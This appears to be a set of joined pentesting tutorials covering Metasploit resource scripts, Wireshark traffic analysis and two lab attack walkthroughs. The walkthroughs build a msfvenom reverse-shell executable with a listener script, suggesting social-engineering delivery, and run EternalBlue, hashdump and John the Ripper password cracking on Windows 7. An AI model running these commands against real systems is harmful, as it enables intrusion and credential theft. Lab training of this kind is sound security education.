Creating a simple resource script to be used with Metasploit.

Whether you are a penetration tester or just performing a simple or regular scan, we all know that the tasks can become repetitive (e.g. when you are performing a pentest in a streamlined environment). Typing the Metasploit commands again and again, making minor changes each time to perform an attack on the target, can get tiresome. This is where resource scripts become very useful: they can be used in Metasploit to automate the repetitive tasks at hand.

They are essentially batch scripts containing a set of commands that are executed automatically and sequentially when you load the resource script in Metasploit. A resource script is created by chaining together a series of Metasploit console commands, mainly used for scanning purposes, and you can even embed Ruby directly to do things like call APIs, interact with objects in the database, and iterate actions.

As an example, we are going to create a simple resource script that automates the auxiliary scan of an FTP service and tells us which version of the FTP service the target is currently running.

The commands are basically the same ones you are accustomed to using in Metasploit, with the addition of the automation.

You can create the script in any text editor you feel comfortable with.

We’ll create the script by typing Metasploit commands (the commands have the same structure as in the console), and when the script is loaded they will be executed one after the other, in sequence.

The first command we’ll use is the following:

msfconsole
use auxiliary/scanner/ftp/ftp_version

This will execute the scanning process and will tell us what ftp version is running in the target, as we have said before.

The next command will be to “see” what options you want to execute in the Pentest using the script you’ll be creating.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > show options

As a result, you will see the options available for the FTP scanner module. For this example, the most important ones are RHOSTS (the target host, or the appropriate range of target machines) and THREADS.

So for the script, we can do the following:

use auxiliary/scanner/ftp/ftp_version
# target host
set RHOSTS 192.168.100.4
# number of threads
set THREADS 10

The number of threads depends on the scale of the network: if you are scanning a large network, you have to increase the number of threads you use.

There is something to consider here: you can change these values “on the fly”. You don’t have to type the commands into the Metasploit console again and again when you want to change the options you are exploring; you change them in the script, and the script can be executed remotely.

Now we just execute the module with run (or with exploit, if you are using an exploit module). As this is a simple resource script, we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.103
set THREADS 10
run

We save this text file as ftp_scanner.rc. With vim:

vim ftp_scanner.rc

Then type the script contents:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4
set THREADS 10
run

and press Esc, then type :w to save the file.


The extension .rc stands for resource script. Now we change to the directory where the script is located. In the terminal you type:

cd (location of the script you just created)

Make sure that the Metasploit PostgreSQL database is set up and already running. Now we can run the FTP service scan with this script, using the configured THREADS against the RHOSTS target.

In Metasploit we type

msfconsole -r ftp_scanner.rc


This will start the Metasploit Framework and launch the created resource script.
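Writing the .rc file by hand works for one host, but when the target list comes from an engagement it is easy to mistype an address. The following Python script is an added example (not code from the original post or from Metasploit): it generates the same ftp_scanner.rc shown above from a list of targets and refuses any target that falls outside an agreed scope. The target and scope values are constructed lab addresses.

```python
# Added example: generate the ftp_scanner.rc shown above from a target list,
# refusing any host outside the agreed engagement scope. Not part of Metasploit.
import ipaddress
from typing import Iterable, List

MODULE = "auxiliary/scanner/ftp/ftp_version"


def in_scope(target: str, scope: Iterable[str]) -> bool:
    """True if target (host or CIDR) lies entirely inside one of the scope ranges."""
    net = ipaddress.ip_network(target, strict=False)   # "10.0.0.4" becomes 10.0.0.4/32
    return any(net.subnet_of(ipaddress.ip_network(s, strict=False)) for s in scope)


def build_ftp_scanner_rc(targets: Iterable[str], scope: Iterable[str], threads: int = 10) -> str:
    """Return the text of a Metasploit resource script for the FTP version scanner.

    targets: hosts or CIDR ranges to scan; scope: ranges the engagement allows;
    threads: value for THREADS, which the post ties to the size of the network.
    """
    checked: List[str] = []
    for t in targets:
        if not in_scope(t, scope):
            raise ValueError(f"{t} is outside the agreed scope")
        net = ipaddress.ip_network(t, strict=False)
        # Single hosts are written plainly; ranges keep their CIDR notation.
        checked.append(str(net.network_address) if net.num_addresses == 1 else str(net))
    if not 1 <= threads <= 256:
        raise ValueError("THREADS should be a small positive number")
    lines = [
        "# generated resource script; lines starting with # are comments",
        f"use {MODULE}",
        f"set RHOSTS {' '.join(checked)}",   # RHOSTS accepts space-separated hosts/ranges
        f"set THREADS {threads}",
        "run",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Constructed example values: one host and one /28 inside a lab /24.
    rc = build_ftp_scanner_rc(["192.168.100.4", "192.168.100.16/28"], ["192.168.100.0/24"])
    with open("ftp_scanner.rc", "w") as fh:
        fh.write(rc)
    print(rc)
```

The generated file is loaded exactly as before with msfconsole -r ftp_scanner.rc.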

Advantages of the Resource Scripts

Now the interesting thing about this procedure is that, after performing the scan and getting the results sorted and ready for you to assess, if you want to change the IP or increase the threads you just have to edit the script and run it again.

The versatility of resource scripts lies in their ability to take advantage of many of the capabilities available in Metasploit and Ruby, whether you use them from the Metasploit console or from the Metasploit web interface.

The Metasploit Framework community has made many resource scripts available, so if you are a framework user, you can go to.

Here at Infosec Addicts, in our Pentesting Candidate program and Ultimate Hacklab courses, you can get more information about creating these useful tools to facilitate any audit procedure or pentest using Metasploit. We sincerely hope you join us in this quest of finding the best and most reliable solutions for performing a pentest in a thorough and reliable way.


Data-mining a compromised host

In this post we are going to take a file (it can be a .txt, .doc or .exe), inject a payload into it, then check which antivirus products detect it, and finally place this file on the victim and observe what happens.

What is a payload?

We can say that a payload is the harmful part that is activated when malware executes: besides raising privileges, it takes full advantage of the vulnerabilities found. In essence, the payload is the part of the malicious code within the exploit that is in charge of exploiting that vulnerability to the maximum.

Installing tools on Ubuntu and Debian

This post does not focus on installing Metasploit, but we will do a little review so you know what it is about.

Open a Linux terminal and copy and paste the following command:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

The result of the command will be the following:

In case you have an error with the installation, you can find the necessary documentation at https://www.metasploit.com/.

There are many tools for creating a payload; a significant one is Metasploit. We will generate a payload to attack Windows 7.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 -b '\x00' -f exe -o Meterpreter.exe

This is the file that we have created and that we will put on the victim machine.

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.100.3 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc

msfconsole -r meterpreter.rc

To put the payload on the victim’s machine, you can use social engineering or any other way. In this case, we will upload it with a meterpreter session to make it faster.

The following image shows the file on the Windows 7 machine.

This would be the result of the attack

Checking the victim’s network settings

This is another command we can use for testing; it shows a list of files and directories.

A Meterpreter session, like a Windows shell, gives you a large number of commands that are very useful when carrying out an attack.


How to analyze network protocols with Wireshark

Wireshark is an essential tool for analyzing network protocols, but what is it? How is it used? What results do I get? That is what we will learn in this post. If we are ever hired by a company and asked to analyze network traffic, this is one of the best tools we have, and better still, it is completely free.

Installation of Wireshark

The installation of this tool is very simple. Open a Linux terminal and type the following commands:

$ sudo apt-get -y install wireshark

$ sudo apt-get install wireshark-qt

Select Yes and press Enter.

We start Wireshark with the following command:

$ wireshark

$ sudo /usr/bin/dumpcap

$ sudo chmod 4711 /usr/bin/dumpcap

We verify the addresses of each virtual machine. Open a Linux terminal and type:

$ ifconfig

This is the IP address of the virtual machine where we have Wireshark installed.

This is the IP address of the other virtual machine that will help us generate ICMP traffic.

It is not necessary to do the previous verification, we only do it to ensure that the test is successful.

How Wireshark is used

We choose the interface that we want to monitor, for this case we will take the enp0s3.

We select the network protocol that we want to monitor, which in this case is ICMP.

We ping with the following command:

$ ping 192.168.100.4

After pinging, we immediately see the result in Wireshark.

So far we have only got Wireshark working correctly, but what do we do with the amount of information we can export? Don’t be afraid; you will learn something elementary about analyzing and organizing this type of information.

We click on the stop button as shown in the following image.

Then we go to file and export the file as CSV.

We put a name on it and store it in the desired place.

We right-click on the file and choose Open With Other Application.

We select LibreOffice.

We click on OK.

Finally, we have all the information in a spreadsheet, and with LibreOffice you can organize it, filter it, graph it, see which event repeats most, which are the hours of heaviest use, etc. You can also view it on Windows with Excel. It is a simple way to analyze the information, but not the only one.

We look for this icon in our spreadsheet and we click on it.

We select the protocol that we want to filter.

Then we filter the protocol we want to analyze, and we can also plot, depending on the objective of the search. If you want to do the analysis automatically and quickly, Python has several modules for processing the spreadsheet, which can save a lot of time.

Finally, you will have the best criteria to analyze the information.
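As an added example of the automated analysis the previous paragraph mentions (this is not code from the original post), the script below reads a Wireshark CSV export with only the Python standard library and reproduces the spreadsheet steps: filtering one protocol, counting packets per protocol and ranking sources by bytes sent. The embedded CSV is a constructed sample with the default export columns and lab addresses.

```python
# Added example: summarise a Wireshark "Export Packet Dissections > As CSV" file
# without a spreadsheet. Standard library only; sample data is constructed.
import csv
import io
from collections import Counter

# Constructed sample export. Real exports use these same default columns.
SAMPLE_CSV = '''"No.","Time","Source","Destination","Protocol","Length","Info"
"1","0.000000","192.168.100.3","192.168.100.4","ICMP","98","Echo (ping) request  id=0x1a2b, seq=1/256"
"2","0.000412","192.168.100.4","192.168.100.3","ICMP","98","Echo (ping) reply    id=0x1a2b, seq=1/256"
"3","0.512000","192.168.100.3","8.8.8.8","DNS","74","Standard query 0x1234 A example.com"
"4","0.530000","8.8.8.8","192.168.100.3","DNS","90","Standard query response 0x1234 A example.com"
"5","1.000000","192.168.100.3","192.168.100.4","ICMP","98","Echo (ping) request  id=0x1a2b, seq=2/512"
"6","1.000390","192.168.100.4","192.168.100.3","ICMP","98","Echo (ping) reply    id=0x1a2b, seq=2/512"
"7","2.100000","192.168.100.3","192.168.100.4","TCP","74","52344 > 21 [SYN] Seq=0 Win=64240 Len=0"
'''


def load_packets(csv_text):
    """Parse the export into a list of dicts keyed by the header names."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def filter_protocol(packets, protocol):
    """Keep only rows whose Protocol column matches (case-insensitive)."""
    return [p for p in packets if p["Protocol"].upper() == protocol.upper()]


def protocol_counts(packets):
    """Packets per protocol: the view the post builds with a spreadsheet filter."""
    return Counter(p["Protocol"] for p in packets)


def top_talkers(packets, n=3):
    """Bytes sent per source address, largest first."""
    bytes_by_src = Counter()
    for p in packets:
        bytes_by_src[p["Source"]] += int(p["Length"])
    return bytes_by_src.most_common(n)


if __name__ == "__main__":
    pkts = load_packets(SAMPLE_CSV)        # replace SAMPLE_CSV with open(path).read()
    print(protocol_counts(pkts))
    print(top_talkers(pkts))
    for p in filter_protocol(pkts, "icmp"):
        print(p["No."], p["Time"], p["Source"], "->", p["Destination"], p["Info"])
```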

How to Obtain Credentials on a Compromised host

If you are one of those people who are passionate about hacking tests, then you are reading the right thing. First we will look for a way to obtain a reverse shell on our victim, and after that we will get the list of usernames and passwords found on the victim machine.

The lab is the following:

1) We have a local network; it can be that of a company, a home, or any business.

2) We have a victim running Windows 7. You can do the test with any other operating system; you just have to select the appropriate exploit in Metasploit.

3) The attacking machine can be Ubuntu or Kali Linux; the important thing is that it has Metasploit.

Step 1

We turn on the virtual machines and make sure they are connected to the same local network. If they are not, we must configure the network on both computers; if you use VirtualBox, this is elementary to do.

To be sure that the virtual machines are connected to the same local network, we will use nmap.

$ sudo apt-get install nmap
$ sudo nmap -sP <network/mask>

For example:

$ sudo nmap -sP 192.168.1.0/24

Step 2

In a Linux terminal we type the following:

$ msfconsole

After starting the Metasploit console we will use the following exploit:

msf > use exploit/windows/smb/ms17_010_eternalblue
msf > show options
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > show options
We configure the remote and local IP addresses, and likewise the ports.

And finally we type “exploit”.

Step 3

Once the Meterpreter session opens, we type the following:

run post/windows/gather/hashdump

So far we have obtained the usernames and the passwords as hashes.

Step 4

After obtaining the usernames and password hashes, we can use John the Ripper to crack the password. The next part of this post shows the correct way to use John the Ripper.

sudo apt install john

Enter your password when prompted and wait for the installation process to finish.

Step 5

You can save the hash in a .txt file as it appears in the following image.

We create a file with this content.

We type the following commands:

$ cat pass.txt
$ john --single pass.txt
$ john --show pass.txt

The answer is obtained in milliseconds; in this case the password was “example”.